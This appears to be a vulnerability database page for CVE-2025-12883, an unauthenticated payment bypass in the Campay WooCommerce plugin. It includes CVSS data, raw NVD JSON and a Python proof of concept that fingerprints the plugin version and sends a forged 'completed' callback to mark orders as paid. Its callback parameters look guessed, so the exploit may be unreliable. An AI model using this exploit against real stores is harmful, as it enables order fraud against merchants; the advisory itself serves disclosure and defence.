Security Vulnerability Report
CVE-2025-12883 CVSS 5.3 MEDIUM

Published: 2025-12-12 04:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Campay Woocommerce Payment Gateway plugin for WordPress is vulnerable to Unauthenticated Payment Bypass in all versions up to, and including, 1.2.2. This is due to the plugin not properly validating that a transaction has occurred through the payment gateway. This makes it possible for unauthenticated attackers to bypass payments and mark orders as successfully completed resulting in a loss of income.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Campay Woocommerce Payment Gateway <= 1.2.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12883 PoC - Campay WooCommerce Payment Bypass
# This PoC demonstrates the payment bypass vulnerability
import requests

TARGET_URL = "https://vulnerable-site.com/"
ORDER_ID = "1234"  # Example order ID


def exploit_payment_bypass():
    """
    Exploit the unauthenticated payment bypass vulnerability in
    Campay WooCommerce Payment Gateway plugin <= 1.2.2
    """
    # The plugin fails to validate payment gateway transactions
    # Attacker can directly mark order as completed without payment

    # Method 1: Direct callback manipulation
    callback_url = f"{TARGET_URL}?wc-api=wc_campay_gateway&order={ORDER_ID}&status=completed"
    try:
        response = requests.get(callback_url, timeout=10)
        print(f"[*] Sent payment confirmation request to: {callback_url}")
        print(f"[*] Status Code: {response.status_code}")
        if response.status_code == 200:
            print("[+] Order may have been marked as completed!")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")


def check_vulnerability():
    """
    Check if target is vulnerable by examining plugin version
    """
    version_url = f"{TARGET_URL}wp-content/plugins/campay-api/readme.txt"
    try:
        response = requests.get(version_url, timeout=10)
        # Substring match on the readme; any of the listed version strings is treated as vulnerable
        if "1.2.2" in response.text or "1.2.1" in response.text or "1.2.0" in response.text:
            print("[!] Target appears to be running vulnerable version")
            return True
    except requests.RequestException:
        pass
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12883 - Campay WooCommerce Payment Bypass PoC")
    print("=" * 60)
    check_vulnerability()
    exploit_payment_bypass()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12883",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:40.470",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Campay Woocommerce Payment Gateway plugin for WordPress is vulnerable to Unauthenticated Payment Bypass in all versions up to, and including, 1.2.2. This is due to the plugin not properly validating that a transaction has occurred through the payment gateway. This makes it possible for unauthenticated attackers to bypass payments and mark orders as successfully completed resulting in a loss of income."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?old_path=/campay-api/tags/1.2.2&new_path=/campay-api/tags/1.2.3&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/campay-api/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f12fa00-6108-4bd4-9310-8558211f4d0f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```